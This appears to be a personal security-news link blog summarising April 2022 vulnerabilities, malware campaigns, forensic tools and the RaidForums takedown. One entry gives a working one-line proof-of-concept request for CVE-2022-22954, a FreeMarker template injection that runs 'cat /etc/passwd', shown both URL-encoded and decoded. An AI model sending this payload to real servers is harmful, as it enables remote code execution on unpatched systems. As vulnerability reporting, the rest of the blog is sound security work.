Notes

The widely popular WordPress website builder plugin Elementor, which has over 5 million active installations, has recently released version 3.6.3 which contains an important security fix.

This vulnerability could allow any authenticated user, regardless of their authorization, to change the site title, site logo, change the theme to Elementor’s theme, and worst of all, upload arbitrary files to the site.

The arbitrary file upload vulnerability could allow someone to take over the entire site or perform remote code execution (RCE). Critical vulnerability fixed in elementor Wordpress plugin 3.6.3

The aim of this blog post was to present a method for reverse engineering Android application protected by DexGuard using opensource tools, in the context of a real-world example. Using JEB can however speed up the process of deobfuscation, but as far as we know, the most “technical” parts must still be made separately to obtain the decrypted DEX files.

While the device in itself seemed innocuous, it ended up being a great way to gain access to a sensitive network. Stacking layers upon layers of obfuscation doesn’t help against a motivated attacker. Step-by-step guide to reverse an APK protected with DexGuard using Jadx

The AWS VPN Client application is affected by an arbitrary file write as SYSTEM, which can lead to privilege escalation and an information disclosure vulnerability that allows the user’s Net-NTLMv2 hash to be leaked via a UNC path in a VPN configuration file. These vulnerabilities are confirmed to affect version 2.0.0 and have been fixed in version 3.0.0.

A race condition exists during the validation of OpenVPN configuration files. This allows OpenVPN configuration directives outside of the AWS VPN Client allowed OpenVPN directives list to be injected into the configuration file prior to the AWS VPN Client service, which runs as SYSTEM, processing the file. Dangerous arguments can be injected by a low-level user such as “log”, which allows an arbitrary destination to be specified for writing log files.

The impact is an arbitrary file write as SYSTEM with partial control over the contents of the file. This can lead to local privilege escalation or denial of service. CVE-2022-25165 - Privilege Escalation to SYSTEM in AWS VPN Client

Sub3 Suite is a research-grade suite of tools for Subdomain Enumeration, OSINT Information gathering & Attack Surface Mapping. Supports both manual and automated analysis on variety of target types with many available features & tools. For more information checkout the documentation. Sub3 Suite - Subdomain Enumeration Suite

→ in reply to @note#1649599561

On 9 April 2022, security vulnerabilities in the NGINX LDAP reference implementation were publicly shared. We have determined that only the reference implementation is affected. NGINX Open Source and NGINX Plus are not themselves affected, and no corrective action is necessary if you do not use the reference implementation.Addressing Security Weaknesses in the NGINX LDAP Reference Implementation

As Microsoft continues to track the high-priority state-sponsored threat actor HAFNIUM, new activity has been uncovered that leverages unpatched zero-day vulnerabilities as initial vectors. The Microsoft Detection and Response Team (DART) in collaboration with the Microsoft Threat Intelligence Center (MSTIC) identified a multi-stage attack targeting the Zoho Manage Engine Rest API authentication bypass vulnerability to initially implant a Godzilla web shell with similar properties detailed by the Unit42 team in a previous blog. Tarrask malware uses scheduled tasks for defense evasion

Note: I don’t see how this got attributed to HAFNIUM, I guess it’s easy for Prism collectors, Chinese letters -> Chinese APT -> DONE. Also I puked a little in my mouth because of the link to Microsoft but the info might be useful to some of my readers.

Beetlebug is a beginner-friendly Capture the Flag Android application that aims to inspire interest in Mobile Application Security. It is geared towards developers, mobile penetration testers and bug hunters. Features include tracking user’s progress, flag completion state, and so much more! Beetlebug - a very insecure Android CTF app

The darknet platform, mainly popular with fans of data leaks RaidForums, was closed and its infrastructure confiscated as a result of Operation TOURNIQUET, a comprehensive law enforcement operation coordinated by Europol to support independent investigations in the United States, Great Britain, Sweden, Portugal and Romania.

The forum administrator and two of his accomplices were also arrested. - Indictment

A list of open source web security scanners on GitHub and GitLab (just added), ordered by Stars. It does not provide in-depth analysis - for more analysis or a wider range of tools, see the links below. Open Source web security scanners

POC for CVE-2022-22954, one line GET request that will execute the command cat /etc/passwd.

{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

The URL-encoded part is:

${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

Forensics tool for Mikrotik devices. Search for suspicious properties and weak security points that need to be fixed on the router. RouterOS Scanner

Features:

• Get the version of the device and map it to CVEs
• Check for scheduled tasks
• Look for traffic redirection rules
• Look for DNS cache poisoning
• Look for default ports change
• Look for non-default users
• Look for suspicious files
• Look for proxy, socks and FW rules

Forensic tool for processing, analyzing and visually presenting Google Chrome artifacts. ForensiX - Google Chrome forensic tool

Features:

• Mounting of volume with Google Chrome data and preserving integrity trough manipulation process
• Suspect profile and behavior estimations
• Browsing history
• Login data (including parsed metadata)
• Autofills
• Downloads (including default download directory, download statistics…)
• Bookmarks
• Favicons (including all subdomains used for respective favicon)
• Cache
• Volume
• Shared database to save potential evidence found by investigators

→ in reply to @_Blue_hornet

Update: We’ve gotten our hands on an experimental exploit for Nginx 1.18. As we’ve been testing it, a handful of companies and corporations have fallen under it.

Cool, a possible Nginx 1.18 zeroday in the wild. More info about it.

As some further analysis is ongoing, the module relating to the LDAP-auth daemon within nginx is affected greatly. ;) Anything that involves LDAP optional logins works as well. This includes Atlassian accounts. Just working out if we can bypass some common WAFs. Default nginx configs seem to be the vulnerable type, or common configs.

Simple JavaScript code that can be used to filter Startup News 💩 entries via specific words. Can be used in the browser console or with Tampermonkey. Just update the words array.

But, of course, best thing is not to visit that shithole.

(function() {
	var words = [
		"facebook"
	]
	filter();
	function filter() {
		var items = document.querySelectorAll(".athing");
		for (var item of items) {
			var text = item.textContent.toUpperCase();
			for (var word of words) {
				if (text.indexOf(word.toUpperCase()) > -1) {
					console.log('Filtering ' + text + ' (' + word + ')');
					try {
						item.nextSibling.style.display = "none";
					} catch(err) {
					}
					item.style.display = "none";
					break
				}
			}
		}
	}
})();

Recently, we’ve identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.

Some of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server. New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns

On April 4 2022, the Cybersecurity & Infrastructure Security Agency (CISA) added CVE-2021-45382 to its known exploited vulnerabilities catalog. But since the affected products have reached end of life (EOL), the advice is to disconnect them, if still in use. CISA advises D-Link users to take vulnerable routers offline

The future is outside the internet, in DIY communications and life projects. Stop wasting too much time on what is now a corporate “global platform”, anything that is linked to the socialist-capitalist system will always eventually become “platformised” and commercialised.

Slowly but surely, the Internet is changing into a “customer point of service” where the main function is to interact with the corporations and/or regime services. The future obviously is outside the Internet, computation is not somehow a subset of the Internet, it is the other way around.

The Internet is just a platform and a specific communications protocol, can be recreated, improved, and will be. No need to get emotionally attached, so maybe it’s time let it go already.

ForcePoint One DLP EndPoint lacks tamper protection allowing attackers to disable the product, raise privileges and establish persistence on the machine. Tampering With ForcePoint One DLP EndPoint